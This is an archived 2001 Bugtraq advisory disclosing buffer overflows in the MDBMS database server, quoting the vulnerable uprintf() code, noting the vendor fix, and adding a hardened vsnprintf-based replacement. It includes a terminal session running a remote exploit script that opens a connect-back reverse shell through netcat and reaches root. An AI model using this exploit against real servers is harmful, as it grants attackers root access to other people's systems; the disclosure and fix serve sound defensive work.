Dear bugtraq readers,

MDBMS is a SQL database server (currently) for UNIX systems. Version 0.99b9 and
earlier contain an exploitable buffer overflow in the handling of the \s console
command. When a user sends large buffers to the server as multiple lines, these
are appended to each other in one buffer. A subsequent \s command causes the
overflow: the accumulated input is formatted by uprintf() (below), where
vsprintf() writes it into a fixed 10000-byte stack buffer with no length check.

Below is the faulty code (from interface.cc):

    void user::uprintf(char *s, ...)
    {
        char b[10000];                  /* fixed-size stack buffer */
        int len=strlen(outbuf), newlen;
        va_list ap;

        va_start(ap,s);
        vsprintf(b,s,ap);               /* <---- unbounded: writes past b[] once the
                                           formatted output exceeds 10000 bytes */
        va_end(ap);
        newlen=strlen(b);
        while (newlen+len+10>=outsize)  /* outbuf is grown, but b has already overflowed */
            outbuf=(char*)realloc(outbuf,outsize+=1000);
        strcat(outbuf,b);
        FD_SET(fd,&parent->wmask);
    }

mu-b also found a buffer overflow in the "create database" system. This one was
caused by a sprintf() that generated the name of the management variable. It has
been fixed: table and database names can no longer be larger than 128 bytes.

Information about the overflows was sent to martyat_private. He has now fixed
the problems, and new versions of MDBMS can be found at:

    http://www.hinttech.com/mdbms/

We would like to thank Marty for his kind response and quick update.

Exploit example:
----------------

    [teleh0r@localhost mdbms]$ ./mdbms-pms.pl
    -- Remote code execution exploit - MDBMS <= 0.99b --
    <teleh0r@digit-labs.org> - Copyright (c) 2001

    Usage: ./mdbms-pms.pl -t <hostname> -b <back>
        -t <hostname> : hostname to test
        -b <back>     : connect back to ip
        -p <port>     : port (default: 2223)
        -d <delay>    : delay before timeout
        -o <offset>   : offset
        -h            : return to heap

    [teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
    [1] 2070
    listening on [any] 1337 ...
    [teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
    -- Remote code execution exploit - MDBMS <= 0.99b --
    <teleh0r@digit-labs.org> - Copyright (c) 2001

    -> Connected to: 127.1 / MDBMS V0.99b9 ready.
    -> Address : 0x302027d / xor-mask: 0x2020202
    -> Return : 0x80cfe76 / using the heap ...
    -> Sending payload: ...
    -> * Successfully sent payload - good luck!
    connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
    [teleh0r@localhost mdbms]$ % nc -l -v -p 1337
    whoami; uname -mnrsp
    root
    Linux localhost.localdomain 2.4.2-2 i686 unknown
    ...

Exploit code attached.

Sincerely yours,
teleh0r and mu-b

--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
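A hardened counterpart of the uprintf() above, added here as an example and not MDBMS code: vsnprintf() bounds the format result, an oversized line is refused instead of being written past the stack buffer, and the realloc() growth loop is checked for failure and size overflow. The outq_t struct stands in for the user object's outbuf/outsize members, and demo_oversized_line_rejected() with its 20000-byte input is constructed for the demonstration.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for the per-connection output queue (assumed; in MDBMS
   outbuf and outsize are members of class user). */
typedef struct { char *outbuf; size_t outsize; } outq_t;

/* Hardened uprintf(): bounded formatting, refuse lines that do not fit,
   checked growth of outbuf. Returns bytes appended or -1 on error. */
int uprintf_safe(outq_t *q, const char *fmt, ...)
{
    char b[10000];
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(b, sizeof b, fmt, ap);   /* never writes beyond b */
    va_end(ap);
    if (n < 0 || (size_t)n >= sizeof b)        /* error, or output would not fit */
        return -1;
    size_t len  = q->outbuf ? strlen(q->outbuf) : 0;
    size_t need = len + (size_t)n + 1;         /* +1 for the terminator */
    if (need > q->outsize) {
        size_t newsize = q->outsize;
        while (newsize < need) {
            if (newsize > SIZE_MAX - 1000) return -1;  /* size_t overflow */
            newsize += 1000;
        }
        char *p = realloc(q->outbuf, newsize);
        if (!p) return -1;                     /* old outbuf remains valid */
        q->outbuf = p; q->outsize = newsize;
    }
    memcpy(q->outbuf + len, b, (size_t)n + 1);
    return n;
}

/* Constructed scenario: one normal line, then a 20000-byte line like the
   accumulated input from the advisory. Returns 1 if the oversized line
   was refused and the earlier output is left intact. */
int demo_oversized_line_rejected(void)
{
    outq_t q = { NULL, 0 };
    char big[20000];
    memset(big, 'A', sizeof big - 1); big[sizeof big - 1] = '\0';
    if (uprintf_safe(&q, "%s", "MDBMS V0.99b9 ready.\n") < 0) return 0;
    if (uprintf_safe(&q, "%s", big) != -1) return 0;
    int ok = strcmp(q.outbuf, "MDBMS V0.99b9 ready.\n") == 0;
    free(q.outbuf);
    return ok;
}
```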
This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 15:03:10 PDT